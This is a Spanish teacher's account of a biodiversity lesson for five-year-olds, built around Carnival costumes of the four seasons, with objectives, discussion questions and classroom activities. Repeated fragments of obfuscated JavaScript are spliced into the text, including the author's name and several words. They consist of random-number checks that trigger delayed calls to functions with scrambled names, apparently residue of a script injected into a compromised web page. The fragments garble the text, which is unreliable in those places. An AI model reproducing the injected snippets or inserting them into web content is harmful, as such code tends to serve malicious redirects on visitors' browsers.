¿CÓMO TRABAJAR LA BIODIVERSIDAD EN LA EDUCACIÓN INFANTIL?

Autora: María Fernandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}anda Rodríguez Rodríguez 

          Esta experiencia se va a realizar debido a que el año 2010 es el Año Internacional de la bioversidad, es decir, de la diversidad biológica. Su finalidad es la de sensibilizar a nuestro alumnado por la protección de la bioversidad y concienciarles que la extinción de especies es cada vez más alarmante y gran parte de culpa la tiene la actividad humana.


           Para hacerles llegar a nuestros alumnos este gran problema, vamos hacer uso de una de las fiestas tradicionales, los Carnavales.


 


DESARROLLO:

          La siguiente experiencia va dirigida a los alumnos del segundo ciclo de Educación Infantil, nivel 5 años. Hemos planificado objetivos y unas actividades:


           Como OBJETIVOS DIDÁCTICOS propongo:

-        Conocer qué es la bioversidad.

-        Desarrollar la psicomotricidad fina.

-        Mostrar interés y una actitud positiva hacia las actividades propuestas.

-        Memorizar canciones.

-        Comprender cuentos relacionados con el cuidado del entorno.

-        Usar de forma adecuada el vocabulario del tema tratado.

-        Expresarse mediante el lenguaje oral y escrito.

-        Reconocer la ropa, frutos, paisaje, tiempo atmosférico… típicos de cada estación del año.

-        Elaborar carteles.

-        Plantear soluciones ante un problema dado.

-        Desarrollar una actitud de ayuda y colaboración

-        Desarrollar una actitud de atención y escucha.

           A continuación propondré una serie de ACTIVIDADES para hacer nuestra propuesta de actuación más práctica y a la misma vez más divertida y agradable:

  • Mi actuación partirá de lo que los niños saben, es decir, de los conocimientos y experiencias que tienen acerca del tema. Para ello voy a llevar a cabo un diálogo sobre el tema tratado. En este diálogo les preguntaré:

-        ¿Qué es la bioversidad?

-        ¿Por qué se celebra en el año 2010 el Año Internacional de la bioversidad?

-        ¿Cómo podemos contribuir a que disminuya la extinción de especies?

-        ¿Podemos nosotros desde la escuela hacer que disminuya este problema? ¿Cómo?

-        ¿Conocéis algunas especies que están en peligro de extinción?

-        ¿Qué sabéis de las estaciones del año?

-        …

  • A partir de este momento, comienza un tiempo para la motivación. Para ello, les leeré un cuento que trate este problema. A partir de la lectura del cuento vamos a proponer soluciones que las iré anotandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando en la pizarra y finalmente llegaremos a un consenso, es decir, cuáles son las soluciones más adecuadas para solventar este problema.

          Seguidamente, realizaremos entre todos un tulipán en gran tamaño que nos servirá para adornar la clase. En cada parte del tulipán los niños escribirán una frase alusiva al cuidado de nuestro entorno. Por poner unos casos: “no tires papeles al suelo”, “recicla”, “no estropees tu medio ambiente”… Estos mensajes lo escribirán con ayuda de la maestra.


          Posteriormente pasaremos a las actividades de desarrollo, como son:

       Debido a que se aproximaban las fiestas de los Carnavales decidimos las maestras de Educación Infantil reunirnos para decidir de qué nos podíamos disfrazar.


           Una de las maestras nos recordó que estábamos en el Año Internacional de la Bioversidad y que podíamos a hacer mención a ello mediante nuestros disfraces. Hicimos un listado de posibles propuestas. Al final llegamos al acuerdo de que nuestros alumnos se podían vestir de las distintas estaciones del año.


           Seguidamente yo les propuse a mis alumnos disfrazarnos de las diferentes estaciones del año y a todos le gusto muchísimo la idea. Para ello, dividí la clase en cuatro grupos.


-        Un grupo, se disfrazará de la primavera.

-        Otro del verano.

-        El tercer grupo, del otoño.

-        Y el último grupo, del invierno.

           A continuación les comenté a mis alumnos que para vestirnos de las estaciones del año debemos tener conocimientos de las mismas. Juan Antonio, comentó que por qué no le pedimos ayuda a las mamás. A todos nos gustó muchísimo la idea.


          Organicé una charla con las madres/padres donde les comuniqué:


-        Este año nos vamos a disfrazar de las estaciones del año. Para ello he dividido la clase en cuatro grupos.

-        Cada grupo deberá informarse de los frutos típicos, ropa que usamos, cuántos meses dura, colores, fiestas que se celebran, tiempo atmosférico, paisaje… de la estación que le haya tocado.

-        Para la realización de este trabajo sería conveniente que cada grupo fuera con sus hijos a la biblioteca municipal y los dejaran colaborar en esta búsqueda de información (por supuesto con la ayuda de los padres).

-        También, pueden buscar más información en Internet.

           Una vez que teníamos toda la información de las cuatro estaciones del año, decidimos que deberíamos hacérsela llegar a los demás compañeros.  Cada día visitábamos un aula del colegio. Para ello, nombramos un coordinador por cada grupo que sería el portavoz del grupo, es decir, quien explicaría a los compañeros de las otras aulas. La función del coordinador rotaría, es decir, por cada aula que visitábamos había un coordinador diferente.


           Los alumnos de las otras clases al final de la exposición les harían una serie de preguntas que las habían preparado anteriormente.


           Después en el aula decidimos elaborar un árbol propio de cada estación. Cada grupo elaboró el suyo. De las ramas de los árboles colgarán dibujos alusivos a ropa, frutos, colores, los meses que dura, fiestas que se celebran…típicos de una estación determinada.


           Posteriormente, cada grupo realizó un mural con portadas de libros fotocopiadas que trataran de la estación que estaban trabajandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando. Para ello, les pedí a las madres que fotocopiaran aquellos libros que más les interesaban. Cada grupo los pegó en su mural y debajo escribió el título del libro, con ayuda de la maestra. En la parte de arriba del mural escribirán la estación del año que están trabajandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando.


           Tanto los árboles como los murales de las estaciones además de servirnos para conocer más detalladamente cada una de las estaciones del año lo utilizaremos para adornar la clase.


           Patricia comentó que por qué no invitamos a nuestros familiares a visitar la clase ya que nos había quedado muy bonita. A todos nos gustó la proposición de Patricia y nos pusimos a realizar un cartel de invitación que iría colocado en la entrada del colegio. El cartel contenía la siguiente información: